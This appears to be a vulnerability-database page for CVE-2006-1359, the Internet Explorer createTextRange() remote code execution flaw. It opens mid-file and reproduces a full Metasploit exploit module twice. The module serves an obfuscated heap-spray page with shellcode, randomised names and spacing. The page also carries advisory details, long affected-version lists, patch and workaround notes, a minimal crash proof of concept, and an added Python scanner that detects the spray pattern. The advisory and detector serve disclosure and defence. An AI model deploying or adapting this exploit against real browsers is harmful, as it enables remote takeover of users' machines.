		var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""

		# Build out the message
		content = %Q|<html>
<head>
<script language = "javascript">
var #{var_payload} = unescape("#{shellcode}");
var #{var_nopslide} = unescape("#{nops}");
var #{var_slidesize} = 20+#{var_payload}.length;
while (#{var_nopslide}.length<#{var_slidesize}) { #{var_nopslide} += #{var_nopslide}; }
var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize});
var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize});
while(#{var_memblock}.length+#{var_slidesize} < 0x40000) { #{var_memblock} += #{var_fillblock}; }
var #{var_heap} = new Array();
var #{var_index} = 0;
var #{var_maxIndex} = 2020;
function #{var_fillHeap}() {
#{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100);
if (#{var_index}<#{var_maxIndex}) {
#{var_heap}.push(#{var_memblock}+#{var_payload});
#{var_index}++;
#{var_setTimeout}
} else {
#{var_timer}.innerHTML = 100;
#{var_inp} = document.createElement("input");
#{var_inp}.type = "#{var_inputtype}";
#{var_tmp} = #{var_inp}.createTextRange();
}
}
function #{var_start}() {
#{var_setTimeout}#{var_setInterval}
}
</script>
</head>
<body onload="#{var_start}()">
<span id="#{var_timer}"> % </span>
</body>
</html>
|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- Vulnerability information (F83089)

Internet Explorer createTextRange() Code Execution (PacketStormID:F83089)
2009-11-26 00:00:00
H D Moore,Darkeagle,justfriends4n0w,Faithless  metasploit.com
exploit,remote,code execution
windows,xp
CVE-2006-1359

This Metasploit module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This Metasploit module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer createTextRange() Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in Microsoft Internet Explorer.
				Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
				certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
				to a very remote, non-existent memory location. This module is the result of merging three
				different exploit submissions and has only been reliably tested against Windows XP SP2.
				This vulnerability was independently discovered by multiple parties. The heap spray method
				used by this exploit was pioneered by Skylined.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'Faithless <rhyskidd [at] gmail.com>',
					'Darkeagle <unl0ck.net>',
					'hdm',
					'<justfriends4n0w [at] yahoo.com>',
					'anonymous',
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2006-1359'],
					['OSVDB', '24050'],
	  				['MSB', 'MS06-013'],
					['BID', '17196'],
					['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
					['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
					['URL', 'http://www.kb.cert.org/vuls/id/876678'],
					['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
					['URL', 'http://www.shog9.com/crashIE.html'],
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
					
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Create some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Generate a random XML namespace for VML
		xmlns = rand_text_alpha(rand(30)+2)

		# Randomize the javascript variable names	
		rnd              = rand(3)
		var_inputtype    = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
		var_inp          = "_"+rand_text_alpha(rand(6)+3)
		var_tmp          = "_"+rand_text_alpha(rand(6)+3)
		var_payload      = "_"+rand_text_alpha(rand(6)+3)
		var_nopslide     = "_"+rand_text_alpha(rand(6)+3)
		var_slidesize    = "_"+rand_text_alpha(rand(6)+3)
		var_fillblock    = "_"+rand_text_alpha(rand(6)+3)
		var_memblock     = "_"+rand_text_alpha(rand(6)+3)
		var_heap         = "_"+rand_text_alpha(rand(6)+3)
		var_index        = "_"+rand_text_alpha(rand(6)+3)
		var_maxIndex     = "_"+rand_text_alpha(rand(6)+3)
		var_fillHeap     = "_"+rand_text_alpha(rand(6)+3)
		var_start        = "_"+rand_text_alpha(rand(6)+3)
		var_timer        = "_"+rand_text_alpha(rand(6)+3)
		rnd              = rand(2)
		var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
		var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
		
		# Build out the message
		content = %Q|
<html >
<head >
	<script language = "javascript" >
    var #{var_payload} = unescape("#{shellcode}") ;

    var #{var_nopslide} = unescape("#{nops}") ;
    var #{var_slidesize} = 20+#{var_payload}.length ;
    while (#{var_nopslide}.length<#{var_slidesize})
    {
        #{var_nopslide} += #{var_nopslide} ;
    }    

    var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize}) ;
    var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize}) ;

    while(#{var_memblock}.length+#{var_slidesize} < 0x40000)
    {
        #{var_memblock} += #{var_fillblock} ;
    }    

    var #{var_heap} = new Array() ;
    var #{var_index} = 0 ;
    var #{var_maxIndex} = 2020 ;
    
    function #{var_fillHeap}() {
      #{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100) ;
      if (#{var_index}<#{var_maxIndex}) {
        #{var_heap}.push(#{var_memblock}+#{var_payload}) ;
        #{var_index}++ ;
        #{var_setTimeout}
      }
      else {
        #{var_timer}.innerHTML = 100 ;
        #{var_inp} = document.createElement("input") ;
        #{var_inp}.type = "#{var_inputtype}" ;
        #{var_tmp} = #{var_inp}.createTextRange() ;        
      }
    }   
    
    function #{var_start}() {
      #{var_setTimeout}#{var_setInterval}
    }
	</script >
</head >
<body onload = "#{var_start}()"  >
<span id = "#{var_timer}" > % </span >
</body >
</html >
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- Vulnerability Information

OSVDB ID: 24050
Title: Microsoft IE createTextRange() Function Arbitrary Code Execution
Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Workaround, Upgrade
Exploit: Exploit Public, Exploit Commercial

- Vulnerability Description

Microsoft Internet Explorer contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered due to a memory corruption error when processing a specially crafted "createTextRange()" call associated with a "checkbox" object. It is possible that the flaw may allow attackers to remotely take complete control of an affected system resulting in a loss of integrity.

- Timeline

2006-03-22 2006-02-10
2006-03-25 Unknown

- Solution

Upgrade to version 7.0 Beta 2 Preview that was released on March 20, 2006 or higher, as it has been reported to fix this vulnerability. It is also possible to mitigate the flaw by implementing the following workaround: Disable Active Scripting support in the Internet security zone. Note: Disabling Active Scripting may cause some Web sites to work incorrectly.

- References

- Vulnerability Author

- Vulnerability Information

Title: Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability
Class: Design Error
Bugtraq ID: 17196
Remote: Yes
Local: No
Published: 2006-03-22 12:00:00
Updated: 2006-04-17 06:02:00
Credit: Discovered by Joshua Heyer.

- Affected Software Versions

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 7.0 beta2
Microsoft Internet Explorer 6.0 SP2 - do not use
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional

- Vulnerability Discussion


Microsoft Internet Explorer is susceptible to a remote code-execution vulnerability. This issue is due to a flaw that results in an invalid table-pointer dereference.

Remote attackers may exploit this issue to crash affected browsers or to execute arbitrary machine code in the context of affected users.

Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview.

- Exploit

The following HTML content demonstrates this issue by crashing the browser:

<input type="checkbox" id='c'>
<script><!--
r=document.getElementById("c");
a=r.createTextRange();
--></script>

Exploit code is available.
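As an added defender-side example (not part of this page, the Metasploit module quoted earlier, or the crash PoC just above), the following Python scanner classifies an HTML/JS document by the structural indicators those two artifacts exhibit: a long %u-encoded unescape() string, a self-doubling string, an array-push spray loop with a large size ceiling, and createTextRange() invoked on a scripted or checkbox input. Because the module randomises both identifier names and spacing (Rex::Text.randomize_space), the scanner strips all whitespace before matching and never keys on variable names. The names INDICATORS, SPRAY_INDICATORS, ScanResult and scan are my own, and the three fixtures are constructed here: the first mimics the module's page layout using NOP-like placeholder units only, the second is the minimal PoC from this page, and the third is a benign IE-era use of createTextRange() that must not be flagged.

```python
import re
from dataclasses import dataclass

# Indicator regexes run against the content with ALL whitespace removed and
# never match on identifiers: the module randomises both names and spacing,
# so only the structural shape of the page is stable enough to detect.
INDICATORS = {
    # unescape() of a long run of %uXXXX units (how sled and payload are carried)
    "unicode_unescape": re.compile(r'unescape\(["\'](?:%u[0-9a-f]{4}){8,}', re.I),
    # self-doubling string growth X+=X; (the sled is grown to cover the payload)
    "string_doubling": re.compile(r'(\w+)\+=\1;'),
    # repeated push of block+payload onto an array (the spray loop body)
    "array_push_loop": re.compile(r'\.push\(\w+\+\w+\)'),
    # a size ceiling of 0x10000 or more on the block being assembled
    "large_block_ceiling": re.compile(r'<0x[0-9a-f]{5,}', re.I),
    # createTextRange() called on a scripted <input> or on a checkbox input
    "createtextrange_on_input": re.compile(
        r'(?:createElement\(["\']input["\']\)|type=["\']checkbox["\'])'
        r'.{0,400}?createTextRange\(\)', re.I | re.S),
}
SPRAY_INDICATORS = {"unicode_unescape", "string_doubling",
                    "array_push_loop", "large_block_ceiling"}


@dataclass
class ScanResult:
    verdict: str      # clean | createtextrange_poc | heap_spray | heap_spray_createtextrange
    indicators: list  # names of the indicators that matched, in INDICATORS order


def scan(content: str) -> ScanResult:
    """Classify one HTML/JS document by the indicators it contains."""
    flat = "".join(content.split())  # defeat randomised spacing
    hits = [name for name, rx in INDICATORS.items() if rx.search(flat)]
    spray = len(SPRAY_INDICATORS.intersection(hits))
    trigger = "createtextrange_on_input" in hits
    if trigger and spray >= 2:
        verdict = "heap_spray_createtextrange"  # spray plus trigger: the module's layout
    elif trigger:
        verdict = "createtextrange_poc"         # trigger alone: crash-style PoC
    elif spray >= 2:
        verdict = "heap_spray"                  # spray without this particular trigger
    else:
        verdict = "clean"
    return ScanResult(verdict, hits)


# Constructed fixture 1: the shape of the page the module emits, with randomised
# names and spacing; the %u units are NOP-like placeholders, not a real payload.
SPRAY_PAGE = """<html >
<head >
 <script language = "javascript" >
  var _kqz = unescape("%u4141%u4141%u4141%u4141") ;
  var _ptl = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") ;
  var _wcd = 20+_kqz.length ;
  while (_ptl.length<_wcd) { _ptl += _ptl ; }
  var _fb = _ptl.substring(0,_wcd) ;
  var _mb = _ptl.substring(0,_ptl.length-_wcd) ;
  while(_mb.length+_wcd < 0x40000) { _mb += _fb ; }
  var _hp = new Array() ; var _ix = 0 ; var _mx = 2020 ;
  function _fh() {
    if (_ix<_mx) { _hp.push(_mb+_kqz) ; _ix++ ; setTimeout('_fh()', 5) }
    else { _in = document.createElement("input") ; _in.type = "checkbox" ;
           _tm = _in.createTextRange() ; }
  }
 </script >
</head >
<body onload = "_fh()" ></body >
</html >
"""

# Fixture 2: the minimal crash PoC quoted on this page.
POC_PAGE = """<input type="checkbox" id='c'>
<script><!--
r=document.getElementById("c");
a=r.createTextRange();
--></script>
"""

# Constructed fixture 3: a benign, IE-era use of createTextRange() on a textarea.
BENIGN_PAGE = """<textarea id="ta"></textarea>
<script>
var t = document.getElementById("ta");
if (t.createTextRange) { var rng = t.createTextRange(); rng.collapse(true); rng.select(); }
</script>
"""

if __name__ == "__main__":
    for label, page in (("spray", SPRAY_PAGE), ("poc", POC_PAGE), ("benign", BENIGN_PAGE)):
        result = scan(page)
        print(f"{label:>7}: {result.verdict:28} {result.indicators}")
```

The trigger indicator alone only earns a "createtextrange_poc" verdict, since createTextRange() has legitimate uses; it is the combination with two or more spray indicators that reproduces the layout of the module's generated page.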

- Solution


The Internet Explorer 7 Beta 2 Preview released on March 20, 2006 is not affected by this vulnerability. Users of earlier Internet Explorer 7 beta releases are advised to upgrade. Updates are not currently available for other Internet Explorer releases.

Microsoft has released a cumulative update to address this issue. Please see the referenced advisories for further information.

Reportedly, the fixes provided in MS06-013 may cause unintended breakage with certain ActiveX controls. Symantec has not confirmed this. Before deploying this patch in production environments, users should thoroughly test the patch to ensure that it doesn't interfere with other software.


Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0 SP2 - do not use

Microsoft Internet Explorer 6.0

- References

 

 
